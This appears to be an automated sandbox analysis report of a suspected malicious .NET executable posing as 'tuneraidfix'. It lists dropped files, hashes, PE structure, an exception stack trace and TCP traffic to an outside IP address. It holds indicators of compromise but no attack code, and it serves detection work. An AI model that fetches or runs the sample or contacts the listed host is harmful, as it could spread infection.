                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1270571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmp.dmp
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Nov 25 23:00:36 2021, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):265465
                                                                                            Entropy (8bit):4.033325209537863
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:cW5Eyjd+pSH0Nm9gIOgF5vUosoYo0WUCgUqOYD:cW5+py089RpD8mYo/Tj
                                                                                            MD5:61DEC122981DCBAF67F08434AC469B4A
                                                                                            SHA1:0A6176FB439D97D67B6BB2FB35E1389297257695
                                                                                            SHA-256:EA7D144F9261ED3EF91EC2C581E1C1DCFF59D4C35A4B72BA162EE0D7F0D749D0
                                                                                            SHA-512:65363992A31A8DCB06C79F5D6AE9D77EC54674BE389A32E901374A7BD485F650AA1586CC52F513EFB51901094523D1C4290428F2D74940751C14569B08415B5C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: MDMP....... ..........a............D...............X.......<....#.......*...Q..........`.......8...........T............6..............T#..........@%...................................................................U...........B.......%......GenuineIntelW...........T..............a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1572864
                                                                                            Entropy (8bit):4.268220487373255
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nYwMHc2yn+SCXqM+mxefKlphce5T7h0MMOb9PeLcuD7ZowN8EwDo3uu/:YwMHc2yn+SCXqM+BYto/
                                                                                            MD5:B5F6B82A5212B44A94CBE12A338DB812
                                                                                            SHA1:CC1A390F17462BB005F4896918345FB4BC15204B
                                                                                            SHA-256:C8611DE05BEFFE985DEA2AE15A55989FBBD0BA83419F7374DCF107C8AF90C203
                                                                                            SHA-512:17C27C5E40BF78B2CE94433A44730705CA78935F1440AA51E19CDE6473B5B6054F7A7BC3FD4E28328C901A5407BEC4D08637717679BF014BA1A8D9D4B592F032
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...=P..................................................................................................................................................................................................................................................................................................................................................`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):24576
                                                                                            Entropy (8bit):3.807504640723351
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:5UF5TZrdxdXD5FQp8XXQnGOf2o/Pmxwpm5GjZmGmBDTTmb5NGUtYbm:S7Nr1XDQpl1f2o2xwpaWmGmpTmVNGUYb
                                                                                            MD5:7D4E158A3C81C4432E34E07591F31C8E
                                                                                            SHA1:7DFADAD40FC3098F78C9E2730C47F3353C3305F6
                                                                                            SHA-256:45734C12A12E5C99B6CCDE171BF321CECE88FDC91D8815A59E54979093969C18
                                                                                            SHA-512:366F38879BBF7B422E4EAFAA43789864E98B15E5CAA73891E0415FB5C6DFF42ED086C3CC8E81A64A9ACD4AB6C88ED522A689BFA390EAB71BFD7B1F1928F74055
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...=P..................................................................................................................................................................................................................................................................................................................................................`HvLE.^......P..............7..$..9..r.|............................. ..hbin................p.\..,..........nk,.R..=P................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .R..=P....... ...........P............... .......Z.......................Root........lf......Root....nk .R..=P....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                            \Device\ConDrv
                                                                                            Process:C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1306
                                                                                            Entropy (8bit):4.990885062259935
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:15wG4C4iWonzpwXWonz6OZkZWGO8sOZcTGpmmwhfoswDEkrl6eR1S1ZRpzZHVwre:sGr4iWozQWozLk8cJE5hfSIz91ZRpse
                                                                                            MD5:7685F6A27382549A35DF3EDA62761724
                                                                                            SHA1:50D09D93E5BD99DDA67FDBC0661AFBABFC2CDA13
                                                                                            SHA-256:02DC0D80E62CBEC6C231EA3AE11D32F585D558978E46D2AB533A53F87D538B7F
                                                                                            SHA-512:F3C44E4BD8123B09BF51A9C2983237F8F1C3D36F1A4CBDD9BC1CF65B0AD8426C778C02DB604D7EB20AA3100A5740C981CDF8D6413DA2B47129EF669F30052581
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: .Unhandled Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentException: Process with an Id of 4896 is not running... at System.Diagnostics.Process.GetProcessById(Int32 processId, String machineName).. at System.Diagnostics.Process.GetProcessById(Int32 processId).. at fixedhost.modulation.d1TYC4A1(String path, String cmd, Byte[] data, Boolean d7W15ADW2).. at fixedhost.modulation.cookie(String path, String cmd, Byte[] data).. --- End of inner exception stack trace ---.. at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor).. at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments).. at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture).. at System.RuntimeType.InvokeMember(String name, Bind

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):4.673644197618154
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:W7UbgU8x18.exe
                                                                                            File size:24064
                                                                                            MD5:01f140fea9669403791fb89c47138d69
                                                                                            SHA1:c4278cf25da52adc05f4d2161a11c7b96928ccea
                                                                                            SHA256:f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
                                                                                            SHA512:e0b76497aaea31d9915a65eeec2dcdc33ca7ca99377a12b1341a61733869438c02b74e5b09e52b899846e24e675c5eac17c6d940350ac2edf51c53e4a5fab8b9
                                                                                            SSDEEP:384:6ARfkJGzRvrQRkKA4rsf1t2kV5qSaciCjFortND8QobS58/pJbouSbx0Ci3HzKQC:jfkJGzFrQ/Bajf57iBDuf/pJbouSbyCp
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p2............"...0..T..........*r... ........@.. ....................................`................................

                                                                                            File Icon

                                                                                            Icon Hash:00828e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x40722a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                            Time Stamp:0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x71d70x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x5d8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x71200x38.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x52300x5400False0.393322172619data4.77599367946IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x80000x5d80x600False0.430989583333data4.17289736273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_VERSION0x80900x348data
                                                                                            RT_MANIFEST0x83e80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Version Infos

                                                                                            DescriptionData
                                                                                            Translation0x0000 0x04b0
                                                                                            LegalCopyrightCopyright 2021
                                                                                            Assembly Version21.13.1.0
                                                                                            InternalNametuneraidfix.exe
                                                                                            FileVersion21.13.1.0
                                                                                            CompanyNameMicoTech
                                                                                            LegalTrademarks
                                                                                            Comments
                                                                                            ProductNametuneraidfix
                                                                                            ProductVersion21.13.1.0
                                                                                            FileDescriptiontuneraidfix
                                                                                            OriginalFilenametuneraidfix.exe

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 25, 2021 15:00:19.096450090 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.124773979 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.124922991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.131431103 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160027981 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160068035 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160084009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160100937 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160116911 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160132885 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160149097 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160170078 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160187006 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160187960 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160207987 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160213947 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160239935 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160264969 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187566042 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187591076 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187608004 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187624931 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187639952 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187659979 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187685013 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187704086 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187706947 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187733889 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187752008 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187755108 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187771082 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187786102 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187803030 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187820911 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187823057 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187855959 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187869072 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187886000 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187902927 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187918901 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187922955 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187942982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187943935 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187961102 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187978029 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.188011885 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.188040018 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215025902 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215044975 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215080976 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215116024 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215145111 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215164900 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215234995 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215251923 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215290070 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215327024 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215343952 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215359926 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215375900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215393066 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215401888 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215410948 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215435982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215454102 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215454102 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215471983 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215487003 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215507030 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215517998 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215555906 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215589046 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215605974 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215621948 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215641022 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215651035 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215682030 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215689898 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215708971 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215724945 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215740919 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215754032 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215761900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215783119 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215784073 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215836048 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215871096 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216353893 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216371059 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216386080 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216406107 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216409922 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216423988 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216440916 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216453075 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216461897 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216479063 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216497898 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216500044 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216519117 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216520071 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216537952 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216542006 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216581106 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.218791008 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.218811035 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.218880892 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244220972 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244267941 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244296074 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244322062 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244348049 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244385958 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244411945 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244421959 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244445086 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244450092 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244456053 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244484901 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244518042 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244555950 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244568110 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244594097 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244610071 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244632959 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244672060 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244685888 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244713068 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244725943 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244749069 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244782925 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244805098 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244820118 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244910002 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244915009 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244971991 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245008945 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245028973 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.245045900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245083094 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245094061 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.245117903 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245157003 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245173931 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.245194912 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245232105 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245251894 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.245266914 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245304108 CET8049722194.85.248.219192.168.2.5
